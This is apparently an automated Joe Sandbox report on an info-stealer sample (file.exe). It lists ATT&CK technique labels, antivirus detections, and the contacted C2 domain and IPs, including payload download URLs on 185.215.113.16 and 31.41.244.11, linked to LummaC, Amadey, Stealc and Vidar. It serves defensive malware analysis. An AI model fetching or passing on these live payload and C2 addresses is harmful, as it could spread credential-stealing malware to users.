              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe47%ReversingLabsWin32.Trojan.Symmi
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/r:UI10%Avira URL Cloudsafe
              https://property-imper.sbs/::0%Avira URL Cloudsafe
              https://property-imper.sbs/-int;0%Avira URL Cloudsafe
              https://property-imper.sbs/70%Avira URL Cloudsafe
              http://185.215.113.16/off/def.exesO?yI0%Avira URL Cloudsafe
              http://185.215.113.16/D0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              172.67.162.84
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    js.monitor.azure.com
                    unknown
                    unknownfalse
                      high
                      mdec.nelreports.net
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://property-imper.sbs/apifalse
                          high
                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_107.6.drfalse
                              high
                              https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_107.6.drfalse
                                    high
                                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.linkedin.com/cws/share?url=$chromecache_99.6.dr, chromecache_89.6.drfalse
                                        high
                                        http://185.215.113.16/Ofile.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17file.exe, 00000000.00000003.1792677260.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768451222.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768273755.000000000522C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792498154.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792840722.0000000005225000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/Youssef1313chromecache_107.6.drfalse
                                                high
                                                https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_99.6.dr, chromecache_89.6.drfalse
                                                  high
                                                  https://aka.ms/msignite_docs_bannerchromecache_99.6.dr, chromecache_89.6.drfalse
                                                    high
                                                    https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_89.6.drfalse
                                                      high
                                                      http://polymer.github.io/AUTHORS.txtchromecache_99.6.dr, chromecache_89.6.drfalse
                                                        high
                                                        https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_107.6.drfalse
                                                          high
                                                          https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_99.6.dr, chromecache_89.6.drfalse
                                                            high
                                                            https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_107.6.drfalse
                                                              high
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.c.lencr.org/0file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://x1.i.lencr.org/0file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://aka.ms/pshelpmechoosechromecache_99.6.dr, chromecache_89.6.drfalse
                                                                      high
                                                                      https://aka.ms/feedback/report?space=61chromecache_107.6.drfalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installfile.exe, 00000000.00000003.1768451222.0000000005200000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://learn-video.azurefd.net/vod/playerchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                              high
                                                                              https://property-imper.sbs/::file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://twitter.com/intent/tweet?original_referer=$chromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                high
                                                                                https://github.com/gewarrenchromecache_107.6.drfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                      high
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_107.6.drfalse
                                                                                          high
                                                                                          https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_107.6.drfalse
                                                                                            high
                                                                                            https://client-api.arkoselabs.com/v2/api.jschromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                              high
                                                                                              https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                high
                                                                                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgfile.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                    high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/Thrakachromecache_107.6.drfalse
                                                                                                        high
                                                                                                        http://crl.microHfile.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://polymer.github.io/PATENTS.txtchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                            high
                                                                                                            https://aka.ms/certhelpchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                              high
                                                                                                              http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://property-imper.sbs/7file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/mairawchromecache_107.6.drfalse
                                                                                                                        high
                                                                                                                        http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1792677260.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768451222.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1768273755.000000000522C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792498154.0000000005225000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792840722.0000000005225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://schema.orgchromecache_89.6.drfalse
                                                                                                                              high
                                                                                                                              http://polymer.github.io/LICENSE.txtchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                high
                                                                                                                                https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://31.41.244.11/files/rnd.exefile.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://property-imper.sbs/file.exe, file.exe, 00000000.00000003.2013977657.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1818714611.0000000005435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://185.215.113.16/off/def.exesO?yIfile.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://aka.ms/yourcaliforniaprivacychoiceschromecache_107.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/nschonnichromecache_107.6.drfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16/file.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/adegeochromecache_107.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://185.215.113.16/Dfile.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1819243149.0000000000E52000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://property-imper.sbs/-int;file.exe, 00000000.00000003.2013977657.0000000000E1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://support.microsoffile.exe, 00000000.00000003.1768273755.000000000522E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/jonschlinkert/is-plain-objectchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1816740484.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://octokit.github.io/rest.js/#throttlingchromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://github.com/js-cookie/js-cookiechromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2014047611.0000000000E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schema.org/Organizationchromecache_107.6.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1768451222.0000000005200000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://channel9.msdn.com/chromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1763125122.00000000051FF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764207692.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://github.com/dotnet/trychromecache_99.6.dr, chromecache_89.6.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://property-imper.sbs/r:UI1file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            13.107.246.63
                                                                                                                                                                            s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                            185.215.113.16
                                                                                                                                                                            unknownPortugal
                                                                                                                                                                            206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                            142.250.181.100
                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                            172.67.162.84
                                                                                                                                                                            property-imper.sbsUnited States
                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                            239.255.255.250
                                                                                                                                                                            unknownReserved
                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                            IP
                                                                                                                                                                            192.168.2.4
                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1561528
                                                                                                                                                                            Start date and time:2024-11-23 16:52:06 +01:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 6m 40s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Number of analysed new started processes analysed:10
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:file.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@24/61@9/6
                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 178.79.238.128, 192.229.221.95, 172.217.21.35, 23.204.129.160, 172.217.19.238, 74.125.205.84, 2.20.41.214, 34.104.35.123, 20.189.173.11, 172.217.17.74, 172.217.19.234, 142.250.181.74, 216.58.208.234, 142.250.181.138, 172.217.19.202, 142.250.181.106, 142.250.181.42, 172.217.17.42, 2.18.66.240, 104.86.110.152, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.217.17.67, 172.217.17.46
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, onedscolprdwus10.westus.cloudapp.azure.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, c1.microsoft.com, wcp
                                                                                                                                                                            • Execution Graph export aborted for target file.exe, PID 4280 because there are no executed function
                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: file.exe
                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            10:53:04API Interceptor56x Sleep call for process: file.exe modified
                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            13.107.246.63file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                185.215.113.16file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.16/off/random.exe
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.16/luma/random.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 185.215.113.16/off/def.exe
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                n5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                Aura.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.162.84
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUSsora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 104.214.22.71
                                                                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 104.147.102.52
                                                                                                                                                                                                sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 20.74.225.207
                                                                                                                                                                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 13.105.41.140
                                                                                                                                                                                                sora.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 20.190.241.21
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 13.107.246.63
                                                                                                                                                                                                yakuza.sh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                • 40.97.215.138
                                                                                                                                                                                                CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                • 172.67.223.140
                                                                                                                                                                                                Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.155.47
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.198.61
                                                                                                                                                                                                S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 104.21.33.116
                                                                                                                                                                                                arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.155.47
                                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                • 172.67.223.140
                                                                                                                                                                                                unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                • 104.26.13.205
